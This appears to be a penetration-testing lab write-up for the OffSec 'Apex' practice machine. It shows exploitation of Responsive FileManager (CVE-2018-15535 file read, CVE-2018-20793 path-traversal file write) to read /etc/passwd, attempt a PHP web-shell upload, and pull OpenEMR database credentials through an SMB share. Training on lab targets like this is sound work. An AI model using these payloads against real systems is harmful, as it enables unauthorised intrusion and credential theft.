Exploitation
The target web server has a vulnerable instance of Responsive FileManager with multiple vulnerabilities identified.
CVE-2018-15535
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/apex]
└─$ python3 CVE-2018-15535.py http://apex.offsec/ PHPSESSID=q979l7fku7b9tiiln4d8upmf16 /etc/passwd
[*] Copy Clipboard
[*] Paste Clipboard
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
sshd:x:109:65534::/run/sshd:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
mysql:x:111:115:MySQL Server,,,:/nonexistent:/bin/false
white:x:1000:1000::/home/white:/bin/sh/Practice/Apex/3-Exploitation/attachments/Pasted-image-20250205235637.png)
The exploit script for CVE-2018-15535 can be used to read file on the target system as it copies and pastes the target file on to the default directory of the Responsive FileManager
Additionally, there is a system user; white
/Practice/Apex/3-Exploitation/attachments/Pasted-image-20250205235829.png)
Interestingly, the filemanager directory can also be accessed via the source directory, presenting the pasted /etc/passwd file
CVE-2018-20793
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/apex]
└─$ curl -X POST http://$IP/filemanager/execute.php?action=create_file -b 'PHPSESSID=q979l7fku7b9tiiln4d8upmf16' -d 'paths[0]=../../../../../../../../var/www/html/source/&names[0]=CVE-2018-20793.txt&new_content=Written by CVE-2018-20793'
File successfully saved. /Practice/Apex/3-Exploitation/attachments/Pasted-image-20250206000331.png)
/Practice/Apex/3-Exploitation/attachments/Pasted-image-20250206000421.png)
Exploit for CVE-2018-20793 allows file write operation
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/apex]
└─$ curl -X POST http://$IP/filemanager/execute.php?action=create_file -b 'PHPSESSID=q979l7fku7b9tiiln4d8upmf16' -d 'paths[0]=../../../../../../../../var/www/html/source/&names[0]=webshell.php&new_content=<?php system($_GET['cmd']); ?>'
File extension is not allowed. Valid extensions: txt, log, xml, html, css, htm, js,/Practice/Apex/3-Exploitation/attachments/{18679882-DF1D-48BB-8103-B053B17C01C1}.png)
However, it’s limited to a certain set of file extensions as the application only supports them
Writing a webshell doesn’t seem to be a viable option
OpenEMR
There is an OpenEMR instance running at the /openemr endpoint, which redirects to a login page
/Practice/Apex/3-Exploitation/attachments/{C48D5319-36D4-4D84-ACE0-41049DFE93C5}.png)
Checking the source code to look for files that may contain credentials
/Practice/Apex/3-Exploitation/attachments/{A17450AE-5849-4936-9BF1-B13354184102}.png)
Installation guide reveals the configuration file for database; openemr/sites/default/sqlconf.php
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/apex]
└─$ python3 CVE-2018-15535.py http://apex.offsec/ PHPSESSID=q979l7fku7b9tiiln4d8upmf16 /var/www/openemr/sites/default/sqlconf.php
[*] Copy Clipboard
[*] Paste Clipboard
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache/2.4.29 (Ubuntu) Server at apex.offsec Port 80</address>
</body></html>Using the exploit for CVE-2018-15535, attempting to read the sqlconf.php fails
Interestingly, it did copy and paste the file
/Practice/Apex/3-Exploitation/attachments/{C2ED970A-3B90-47F2-B504-5C9BCE292E9D}.png)
/Practice/Apex/3-Exploitation/attachments/{620DFB5E-FEDA-4C6A-86D8-AD63A540CAF1}-1.png)
Yet, it doesn’t show up on those endpoints
Workaround
/Practice/Apex/3-Exploitation/attachments/{3BD80EBA-1C9A-48AF-98C5-EEE50695A32C}.png)
The /source/Documents directory is shared as the docs Samba share as enumerated earlier
/Practice/Apex/3-Exploitation/attachments/{16B57C30-100B-490B-97B1-77CD35D787E7}.png)
I can try to paste the target file into the /Documents directory, which will be visible on the docs Samba share
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/apex]
└─$ python3 CVE-2018-15535.py http://apex.offsec/ PHPSESSID=q979l7fku7b9tiiln4d8upmf16 /var/www/openemr/sites/default/sqlconf.php
[*] Copy Clipboard
[*] Paste Clipboard
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache/2.4.29 (Ubuntu) Server at apex.offsec Port 80</address>
</body></html>/Practice/Apex/3-Exploitation/attachments/Pasted-image-20250206015754.png)
/Practice/Apex/3-Exploitation/attachments/{AC52879A-7605-4ED4-90ED-EBF2B4D961D9}-1.png)
Running the exploit for CVE-2018-15535 yielded an interesting outcome
The sqlconf.php file can be found at the /source/Documents endpoint, whereas accessing the /Documents directory through Responsive FileManager at /filemanager does not show the file although it highlights that there are 3 files in the directory
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/apex/smb]
└─$ smbclient //192.168.196.145/docs
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Feb 6 01:56:03 2025
.. D 0 Thu Feb 6 00:02:32 2025
sqlconf.php N 639 Thu Feb 6 01:56:03 2025
OpenEMR Success Stories.pdf A 290738 Fri Apr 9 17:47:12 2021
OpenEMR Features.pdf A 490355 Fri Apr 9 17:47:12 2021
16446332 blocks of size 1024. 10835572 blocks availableThe sqlconf.php file can also be accessed through SMB
sqlconf.php
smb: \> get sqlconf.php
getting file \sqlconf.php of size 639 as sqlconf.php (7.3 KiloBytes/sec) (average 7.3 KiloBytes/sec)
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/apex/smb]
└─$ cat sqlconf.php
<?php
// OpenEMR
// MySQL Config
$host = 'localhost';
$port = '3306';
$login = 'openemr';
$pass = 'C78maEQUIEuQ';
$dbase = 'openemr';
//Added ability to disable
//utf8 encoding - bm 05-2009
global $disable_utf8_flag;
$disable_utf8_flag = false;
$sqlconf = array();
global $sqlconf;
$sqlconf["host"]= $host;
$sqlconf["port"] = $port;
$sqlconf["login"] = $login;
$sqlconf["pass"] = $pass;
$sqlconf["dbase"] = $dbase;
//////////////////////////
//////////////////////////
//////////////////////////
//////DO NOT TOUCH THIS///
$config = 1; /////////////
//////////////////////////
//////////////////////////
//////////////////////////
?>The sqlconf.php file contains the DB credential; openemr:C78maEQUIEuQ
Validating against the target MySQL server